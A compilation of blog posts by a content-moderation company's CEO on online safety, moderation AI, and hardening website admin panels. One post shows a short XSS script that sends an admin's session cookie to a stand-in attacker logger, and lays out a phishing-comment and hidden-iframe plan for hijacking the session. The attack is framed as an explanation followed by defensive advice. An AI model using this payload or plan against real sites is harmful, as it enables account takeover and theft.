Witnessing the Dawn of the Internet’s Duty of Care

As I write this, we are a little more than two months removed from the terrorist attacks in Christchurch. Among many things, Christchurch will be remembered as the incident that galvanized world opinion, and more importantly global action, around online safety.

In the last two months, there has been a seismic shift in how we look at internet safety and how content is shared. Governments in London, Sydney, Washington, DC, Paris, and Ottawa are considering or introducing new laws, financial penalties, and even prison time for those who fail to remove harmful content quickly. Others will follow, and that’s a good thing: securing the internet’s future requires the world’s governments to collectively raise the bar on safety and cooperate across borders.

In order to reach this shared goal, it is essential that technology companies engage fully as partners. We witnessed a huge step forward just last week when Facebook, Amazon, and other tech leaders came out in strong support of the Christchurch Call to Action. Two Hat stands proudly with them.

Clear terms of use, timely action by social platforms on user reports of extremist content, and transparent public reporting are the building blocks of a safer internet. Two Hat also believes every website should have baseline filtering for cyberbullying, images of sexual abuse, extremist content, and encouragement of self-harm or suicide.

Crisis protocols for service providers and regulators are essential, as well — we have to get better at managing incidents when they happen. Two Hat also echoes the need for bilateral education initiatives with the goal of helping people become better informed and safer internet users.

In all cases, open collaboration between technology companies, governments, not-for-profit organizations, and both public and private researchers will be essential to create an internet of the future that is Safe by Design. AI + HI (artificial intelligence plus human intelligence) is the formula we talk about that can make it happen.

AI + HI is the perfect marriage of machines, which excel at processing billions of units of data quickly, guided by humans, who provide empathy, compassion, and critical thinking. Add a shared global understanding of what harmful content is and how we define and categorize it, and we are starting to address online safety in a coordinated way.

New laws and technology solutions to moderate internet content are necessary instruments to help prevent the incitement of violence and the spread of online hate, terror and abuse. Implementing duty of care measures in the UK and around the world requires a purposeful, collective effort to create a healthier and safer internet for everyone.

Our vision of that safer internet will be realized when exposure to hate, abuse, violence and exploitation no longer feels like the price of admission for being online.

The United Kingdom’s new duty of care legislation, the Christchurch Call to Action, and the rise of the world’s collective will all move us closer to that day.

Two Hat is currently offering no-cost, no-obligation community audits for anyone who could benefit from a second look at their moderation techniques.

Our Director of Community Trust & Safety will examine your community, locate areas of potential risk, and provide you with a personalized community analysis, including recommended best practices and tips to maximize user engagement. This is a unique opportunity to gain insight into your community from an industry expert.

Book your audit today.

To Mark Zuckerberg

Re: Building Global Communities

“There are billions of posts, comments and messages across our services each day, and since it’s impossible to review all of them, we review content once it is reported to us. There have been terribly tragic events — like suicides, some live streamed — that perhaps could have been prevented if someone had realized what was happening and reported them sooner. There are cases of bullying and harassment every day, that our team must be alerted to before we can help out. These stories show we must find a way to do more.” — Mark Zuckerberg

This is hard.

I built a company (Two Hat Security) that is also contracted to process 4 billion chat messages, comments, and photos a day. We specifically look for high-risk content in real time, such as bullying, harassment, threats of self-harm, and hate speech. It is not easy.

“There are cases of bullying and harassment every day, that our team must be alerted to before we can help out. These stories show we must find a way to do more.”

I must ask — why wait until cases get reported?

If you wait for a report to be filed by someone, haven’t they already been hurt? Some things that are reported can never be unseen. Some, like Amanda Todd, can never have that image retracted. Others post when they are enraged or drunk, and the words, like air, cannot be taken back. The saying goes, “What happens in Vegas stays in Vegas, and on Facebook, Twitter, and Instagram forever,” so maybe some things should never go live. What if you could proactively create a safe global community for people by preventing (or pausing) personal attacks in real time instead?

This, it appears, is the key to the next point in your vision.

“How do we help people build an informed community that exposes us to new ideas and builds common understanding in a world where every person has a voice?”

One of the biggest challenges to free speech online in 2017 is that we allow a small group of toxic trolls the ‘right’ to silence a much larger group of people. Ironically, these users’ claim to free speech often ends up becoming hate speech and harassment, destroying the opportunity for anyone else to speak up, much like bullies in the lunchroom. Why would someone share their deepest thoughts if others would just attack them? The dream of real conversations gets lost beneath a blanket of fear; instead, we get puppy pictures, non-committal thumbs up, and posts that are ‘safe.’ If we want to create an inclusive community, people need to be able to share ideas and information online without fear of abuse from toxic bullies. I applaud your manifesto, as it calls this out and calls us all to work together to achieve this.

But how?

Fourteen years ago, we both set out to change the social network of our world. We were both entrepreneurial engineers, hacking together experiments using the power of code. It was back in the days of MySpace and Friendster and, later, Orkut. We had to browse to every single friend we had on MySpace just to see if they had written anything new. To solve this, I created myTWU: a social stream of all the latest blogs and photos of fellow students, alumni, and sports teams on our internal social tool. Our office was in charge of building online learning, but we realized that education is not about ideas but community. It was not enough to dump curriculum online for independent study; people needed places of belonging.

A year later “The Facebook” came out. You reached beyond the walls of one University and over time opened it to the world.

So I pivoted. As part of our community, we had a little chat room where you could waddle around and talk to others. It was a skin of a little experiment my brother was running. He was caught by surprise when it grew to a million users, which showed how much people long for community and places of belonging. In those days chat rooms were the dark part of the web, and it was nearly impossible to keep up with the creative ways users tried to hurt each other.

So I helped my brother code the safety mechanisms for his little social game. That little social game grew to become a global community with over 300 million users, and Disney bought it in 2007. I remember huddling in my brother’s basement, rapidly building the backend to fix the latest trick to get around the filter. Club Penguin was huge.

After a decade of kids breaking the filter and of building tools to moderate the millions upon millions of user reports, I had a breakthrough. By then I was in security at Disney, with the job of hacking everything with a Mouse logo on it. In my training, we learned that if someone DDoSes a network or tries to break the system, you find a signature of what they are doing and turn up the firewall against that.

“What if we did that with social networks and social attacks?” I thought.

I’ve spent the last five years building an AI system with signatures and firewalls for social content. As we process billions of messages with Community Sift, we build reputation scores in real time. We know who the trolls are: they leave digital signatures everywhere they go. Moreover, I can adjust the AI to turn up the sensitivity only where it counts. In so doing, we drastically dropped false positives and opened communication for the masses, while still detecting the highest-risk content when it matters.

I had to build whole new AI algorithms to do this, since traditional methods only hit 90–95% accuracy. That is great for most AI tasks, but when it comes to cyberbullying, hate speech, and suicide, the stakes are too high for the current state of the art in NLP.

“To prevent harm, we can build social infrastructure to help our community identify problems before they happen. When someone is thinking of suicide or hurting themselves, we’ve built infrastructure to give their friends and community tools that could save their life.”

Since Two Hat is a security company, we are uniquely positioned to prevent harm with the largest vault of high-risk signatures, like grooming conversations and CSAM (child sexual abuse material). In collaboration with our partners at the RCMP (Royal Canadian Mounted Police), we are developing a system to predict and prevent child exploitation before it happens, complementing the efforts our friends at Microsoft have made with PhotoDNA. With CEASE.ai, we are training AI models to find CSAM, and we have lined up millions of dollars of Ph.D. research to give students world-class experience working with our team.

“Artificial intelligence can help provide a better approach. We are researching systems that can look at photos and videos to flag content our team should review. This is still very early in development, but we have started to have it look at some content, and it already generates about one-third of all reports to the team that reviews content for our community.”

It is incredible what deep learning has accomplished in the last few years. And although we have been able to see near-perfect recall in finding pornography with our current work, there is an explosion of new topics we are training on. Further, the subtleties you outline are key.

I look forward to two changes that would help resolve this:

  1. I call on networks to trust that their users have resilience. It is not imperative to find everything, just the worst. If all content can be sorted from ‘maybe bad’ to ‘absolutely bad’, we can draw a line in the sand: these things cannot be unseen, and those the community will find. In so doing, we don’t have to wait for technology to reach perfection, nor wait for users to report things we already know are bad. Let computers do what they do well, and let humans deal with the rest (a toy sketch of this triage follows below).
  2. I call on users to be patient. Yes, sometimes in our ambition to prevent harm we may flag a Holocaust photo. We know this is terrible, but we ask for your patience. Computer vision is like a child still learning; a child seeing such an image for the first time is deeply impacted and concerned. Join us in reporting these problems and in helping train the system to mature and discern.
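
To make the first point concrete, here is a toy sketch of that line in the sand. It assumes each message already carries a numeric risk score from a classifier; the threshold values and field names are invented for illustration, not taken from any real system.

// Toy triage: the machine acts only where confidence is high, humans review
// the middle band, and community reports catch the long tail. Thresholds are made up.
function triage(message) {
  if (message.riskScore >= 0.98) return "auto-remove";  // cannot be unseen
  if (message.riskScore >= 0.80) return "human-review"; // AI + HI together
  return "publish";                                     // the community will find the rest
}

console.log(triage({ riskScore: 0.99 })); // "auto-remove"

The point of the middle band is that neither extreme has to be perfect: computers take the certain cases, and humans keep the judgment calls.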

However, you are right that many more strides need to happen to get this where it needs to be. We need to call on the world’s greatest thinkers. Of all the hard problems to solve, our next one is child sexual abuse material. Some things cannot be unseen. There are things that, when seen, re-victimize over and over again. We are the first to gain access to hundreds of thousands of CSAM images and train deep learning models on them with CEASE.ai. We are pouring millions of dollars into this and putting the best minds on the topic. It is a problem that must be solved.

And before I move on, I want to give a shout-out to your incredible team, whom I have had the chance to volunteer with at hack-a-thons and who have helped me think through how to get this done. Your company’s commitment to social good is outstanding, and your people have helped many other companies and not-for-profits.

“The guiding principles are that the Community Standards should reflect the cultural norms of our community, that each person should see as little objectionable content as possible, and each person should be able to share what they want while being told they cannot share something as little as possible. The approach is to combine creating a large-scale democratic process to determine standards with AI to help enforce them.”

That is cool. I have a couple of the main pieces needed for that already built, if you need them.

“The idea is to give everyone in the community options for how they would like to set the content policy for themselves. Where is your line on nudity? On violence? On graphic content? On profanity?”

I had the chance to swing by Twitter 18 months ago. I took their sample firehose and have been running it through our system. We label each message across 1.8 million of our signatures, and we put together a quick demo of what it would be like if you could turn off the toxicity on Twitter. It shows low-, medium-, and high-risk content. I would not expect to see anything severe on there, as they have recently tried to clean it up.

My suggestion to Twitter was to allow each user the option to choose what they want to see. First, a global policy removes clear infractions against the terms of use: content that can never be unseen, such as gore or CSAM. After the global policy is applied, each user can then choose their own risk and tolerance levels.

We are committed to helping you and the Facebook team with your mission to build a safe, supportive, and inclusive community. We are already discussing ways we can help your team, and we are always open to feedback. Good luck on your journey to connect the world, and I hope we cross paths next time I am in the Valley.

Sincerely,
Chris Priebe
CEO, Two Hat Security

Originally published on Medium

Forty Languages in Forty Days

I have always been interested in languages. One of my hobbies is to ask new people how to say something in their language. It’s almost always “How are you?”, but my favorite came from the Mayan people, who taught me “Ko’ox hana”, which means “Let’s go eat!”

At Two Hat Security we always like to take on hard challenges. For the last two years, we have been cracking the code of how to filter English. One of the tricks we learned was to ignore that it’s English. For instance, if a 12-year-old kid is trying to get a swear word through, do we really think they’ll use a noun and a verb? So we joke with our Natural Language Processing team that it’s really the study of unnatural language. Early on we decided to make everything Unicode and focus on the risk of characters in the context of other characters.

I was shocked when I threw Arabic Twitter posts at it and it popped out the phone numbers without any effort. Not bad, considering the text runs in the opposite direction 😉 I was even happier when a client asked us to find Finnish usernames, and all I had to do was add the accent mapping and some keywords, and it worked.

My new challenge is to onboard 40 languages all at once and use some really cool algorithms to quickly find the highest-risk items. It’s kind of cheating, since we added unit tests for these languages long ago and have been running some of them for a long time. To make it fun, I’m going to start from scratch and use the Twitter mini-firehose to evaluate it. Keep in touch and let me know if you want to participate.

Photo credit: Symphoney Symphoney/Flickr

Cleaning up Your Website

In my first two posts, I shared how to harden access to the admin tool for your content management system. However, there are a lot of other “backdoors” to the administration of your site that people commonly leave open. Make sure you have not allowed public access to any of the following:

  1. PhpMyAdmin – I see security updates for this one all the time. It is a great tool, but I would not want it publicly available.
  2. “Secret ports” or URLs for server management tools like Plesk or Hsphere.
  3. Tomcat admin
  4. QA testing tools that reset accounts, grant gold or membership, or perform any bulk actions. These are common in a dev environment to allow for testing, but sometimes they get uploaded along with the rest of the source.

Consider some of the solutions I offered for securing your admin site, such as moving these tools to a private server or establishing firewall rules to protect them.

Cleaning up your server, though, goes beyond removing admin tools. Many times files are uploaded to the server to test out new frameworks, or files are accidentally copied over from the dev system. Here are some extra goodies to watch out for:

  1. Library files for your PHP code. Don’t make these web-accessible. If there are any security bugs, people can call your library files directly. Instead of putting them at /var/www/html/includes, put them at /var/www/includes and add that directory to your PHP include path in php.ini.
  2. Frameworks and tools you installed to try out and no longer use. These are one of the worst offenders: since you do not use them, you likely don’t update them, and they quickly become the weakest link.
  3. Old versions of your site or game. If you have an unrefined build process, you probably just copy the directory to /backup and then copy the whole thing up again. As in point #2, those copies will have all your old vulnerabilities.
    Even worse than #3 is doing backups or builds as a .zip or .tar of the entire directory and then leaving the archive on your website. It would not be so bad in /var/www/backups. However, if you stick it in /var/www/html where everyone can download it, all it takes is someone accidentally leaving directory browsing turned on, and your entire source (likely with passwords) is gone. The same is true of log files and reports, for those who log to the same directory (or ./logs) as the PHP file doing the logging. If you’re stuck like this and need backward compatibility, try a .htaccess or firewall rule that blocks all files of type *.log or *.gz (see the sketch after this list).
  4. User file uploads. Sometimes this is unavoidable, like when a user uploads an avatar for their forum profile. However, if the user is just submitting a bug report or fan art, do not store it on the public web. It is possible to embed PHP code into a .jpg and then trick the server into storing it as a .php file. Strong validation would prevent this, but don’t take the added risk.
  5. phpinfo.php – We don’t need to tell the whole world your specific PHP configuration.
  6. /server-status and /server-info – these are set in httpd.conf (there is something similar for Nginx, but I can’t find it right now). They tell how many connections are currently established (hackers can use this to track the status of a DoS attack) and sometimes which URLs are being loaded. Those URLs sometimes include backend web service calls with secret tokens or passwords in them.
  7. Exceptions that produce stack dumps (especially with Java) on critical errors. These reveal how the code works and sometimes dump the variables passed into functions.
  8. Debugging output – this could include FirePHP output, Flash trace statements, and/or stuff put into a hidden div. Some frameworks will dump a full call stack and global variables on a server error – what a treasure trove to give to hackers! Make sure you turn debug mode off in production.
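
To make #3, the backups note, and #6 concrete, here is a rough sketch of Apache rules that close those holes. This uses Apache 2.4 syntax and assumes a stock layout; on Apache 2.2 you would use the older Order/Deny directives instead.

# Deny direct downloads of logs and archived backups anywhere under the docroot
# (works in the vhost config, or in .htaccess where overrides are allowed).
<FilesMatch "\.(log|gz|tar|zip)$">
    Require all denied
</FilesMatch>

# In httpd.conf: keep the mod_status and mod_info pages private.
<Location "/server-status">
    Require all denied
</Location>
<Location "/server-info">
    Require all denied
</Location>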

Protecting Your Admin Site – Part 2

I have been looking into many different CMS solutions. I came across a superb write-up on the challenge of an admin site:

These days the only thing we occasionally hear about are cross site scripting vulnerabilities. Typically these are found in dashboard pages for obscure parts of the CMS or add-ons. In English that means:

1) You log in as admin to your site.

2) You leave that window open as you wander around the web.

3) You go to some nefarious website in another window.

4) Something you click on at that new site is able to do something to your concrete5 site as the user you’re logged in with.

To give you a sense of scale, we typically hear about something like this once every 6 months or so, and we have a fix available within a few days of hearing about it.

One might also point out, you probably don’t need to leave your admin account logged into the dashboard while you go troll torrents… just sayin’.

Concrete5

For the most part, well said, but there is still a serious problem with some simple solutions. One day I would love to have a company contact me and challenge me to get into their CMS. If someone wants to take me up on that challenge, let’s chat and start getting the paperwork rolling with your IT folks.

Just a quick bit of background. Cross-Site Scripting (XSS) is abusing a user’s trust in a site to get their browser to do whatever we want (read more on that here). For example, if I owned a website, I would trust it and let my browser run any JavaScript it wanted on it. However, what if a hacker could write their own JavaScript and hide it on my site? When I come to it, my browser will trust it and just run it, letting the hacker do anything they want (with some limits, like the same-origin policy). If you think about it, anything that could be done with AJAX is fair game, including spidering your site, submitting pages, reading CSRF tokens, scraping web content, downloading malware, and attacking your intranet.

So all I need to do is download a copy of their CMS and find some cross-site scripting vulnerability anywhere on the site. The funny thing is that people usually tell me not to worry about vulnerabilities in the admin site because only admins can see them. Except that to take over the site, the admin site is exactly where I want to get in, and since these bugs are usually treated as low priority, they are often not patched. My goal is their session cookie, so my exploit will create a tiny 1x1-pixel tracking image on the website that loads from mybadsite/logger.php?cookie=document.cookie.
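
As a minimal sketch (not specific to any CMS), the injected payload can be as small as this; mybadsite/logger.php is the hypothetical logger from above, and any page that echoes unsanitized input would do as the injection point:

<script>
  // Runs in the admin's browser; ships their session cookie off to the attacker's logger.
  new Image().src = "http://mybadsite/logger.php?cookie=" + encodeURIComponent(document.cookie);
</script>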

To see what this looks like, enter the following in your browser bar and press Enter:

javascript:alert("Your cookies are: " + document.cookie)

Once I have found my vulnerability, it’s time to exploit it. I would post a comment on the website, since I know it will likely be an admin who reads it first. My comment will have a link to some throwaway site I made, and on that site will be a hidden iframe (though not all browsers might like that) that calls my exploit. The admin goes to approve my comment, clicks on the link to verify it, and behind the scenes the iframe loads the exploit, grabs their session cookie, and emails it to me. I go to their site, change my cookie to match theirs, and (in most cases) the server thinks I am them, and the entire admin site is mine (unless they did one of my favorites and stored the IP and browser signature in the session).

If that did not work, I would have to look at some form of Cross-Site Request Forgery to update their password for them or post something to their blog, but chances are I would need more data to submit any form, like a CSRF token. I trust your site has those, right?

So the advice that “you probably don’t need to leave your admin account logged into the dashboard while you go troll torrents” is good, but it offers a bit of false security. I would guess that most attacks on an admin system are targeted spearphishing attacks: typically an email sent directly to someone at the company, a comment, or a customer support request. Comments are especially effective, since you need to be logged in to review them.

So how do you prevent this?

  1. Make sure you are using the latest version of your content management system – that way you have all the latest security fixes. Don’t fall into the trap of thinking something like “it only fixes the admin site, so I’m not vulnerable.”
  2. Lock down access so that even if they steal your session, they cannot log in (but they will probably know that ahead of time and focus on a longer script that does all the damage using your browser).
  3. Add a firewall or .htaccess rule so that any GET or POST request with variables that comes from an external site (or a blank referer) is redirected to the login page. That way any funny business will not work. You should do this at least for the admin site; you might get a lot of unexpected exceptions and SEO problems if you apply it to your public site. A rough sketch follows below.
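
Here is a minimal .htaccess sketch of rule #3 using mod_rewrite. It assumes the admin tool lives under /administrator and that example.com is your domain; both are placeholders, and a referer check like this is a speed bump rather than a complete defense.

RewriteEngine On
# Admin requests that carry parameters (a POST, or any query string) must
# arrive with a same-site Referer; external or blank referers get bounced
# back to the login page.
RewriteCond %{REQUEST_URI} ^/administrator/ [NC]
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
RewriteCond %{REQUEST_METHOD} =POST [OR]
RewriteCond %{QUERY_STRING} !^$
RewriteRule .* /administrator/index.php [R=302,L]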

Protecting Your Admin Site – Part 1

I saw this while browsing the web the other day.

Server: Apache/2.2.12 (Ubuntu)

X-Content-Encoded-By: Joomla! 1.5

X-Powered-By: PHP/5.2.10-2ubuntu6.7

I am not going to be too hard on them, because I see this all the time, but it does make an excellent starting point for something that needs to be fixed. I’m going to ignore the fact that they are using an old version of Apache (which may be patched) and old versions of PHP and Ubuntu. What caught my eye was that they were using Joomla.

I’ve always wanted to play with Joomla, so I pulled up http://www.joomla.org/ and found a “demo” button. Clicking on that demo button, I got a backend demo, which is a cool way to check out the product without having to install it.

However, I noticed that the admin interface is at /administrator, and I wondered how many sites leave this on their public website. So if you went to somedomain.com/administrator, would it ask you to enter a username and password? Tell me: why do I, as a guest to the site, need a prompt for the administration site? Do they want me to log in and change their website for them?

Quite frankly, the answer is usually:

  1. We installed this years ago when we were checking out multiple frameworks. The project had a tight deadline, and we never had time to go back and tighten it up.
  2. We have outside consultants helping us with content and layout, and we never know what their IP is from week to week.
  3. I do not know how to secure it.

That is as far as I went, other than informing the owner of the site and encouraging them to fix it. However, this reminded me that many sites are like this. Putting your admin site on your public website is a bad idea, and here’s why:

  1. Curious people will find it (like I did). It is not that hard to guess the few dozen directories where admin files usually are. In fact, there are tools like DirBuster designed to find unpublished directories. Assume people will find your admin site.
  2. Someone on your staff will almost always have a bad password or will have reused it on another site. That other site gets hacked, and there are the password, the email address, and your site name. Alternatively, how hard is it to try “password”, “password1” and “password1?” Sounds like something that ‘could’ be automated.
  3. A new exploit is found in your favorite CMS – you wanted to run the update, but you are not sure if it would break that custom code you put in. Blast it all; they’re already in….

Here are some alternatives:

  1. Stick your admin tool on an internal site and then either have it publish static files to your public site or write to your external database.
  2. If you can’t do that, at least use a firewall rule or .htaccess rule to block the admin pages from anyone not coming from an approved IP address (see the sketch after this list).
  3. Cache your site with a tool like Varnish and disallow the admin directory. Use a concept like a bastion host to give you access to the backend port the real server is running on.
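
For option 2, a minimal sketch of an .htaccess file dropped into the admin directory (Apache 2.4 syntax; the address range is a documentation placeholder for your approved IPs, and on Apache 2.2 the equivalent is Order deny,allow with Deny from all and Allow from your range):

# /administrator/.htaccess: only the approved office range can even see
# the login page; everyone else gets a 403.
Require ip 203.0.113.0/24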